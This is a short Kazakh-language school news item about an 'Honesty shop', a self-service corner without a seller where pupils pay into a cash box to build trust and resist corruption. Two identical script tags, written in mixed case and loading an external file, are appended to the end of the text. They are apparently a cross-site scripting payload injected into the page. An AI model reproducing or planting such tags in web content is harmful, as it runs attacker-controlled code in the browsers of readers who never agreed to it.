Мектебімізде оқушылардың күнделікті сұраныстарын қанағаттандыратын "Адалдық дүкені" атты шағын сауда бұрышы ашылды. Ашылған сауда бұрышында сатушы қызметі қарастырылмаған, ұстаздар мен оқушылар өздеріне өздері қызмет көрсету жүйесі негізінде қажетті заттарын таңдап, алған тауарларына ақшалай төлемді кассалық жәшікке салып, есеп айырысады. Аталған фактор "Сыбайлас жемқорлыққа қарсы иммунитетті" қалыптастыруға негізделген.Сауда бұрышын ашудағы басты мақсаттардың бірі кезең - кезеңмен сенім атмосферасын құру, оқушыларға өздерін адал тұлға ретінде анықтауға берілетін мүміндік.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>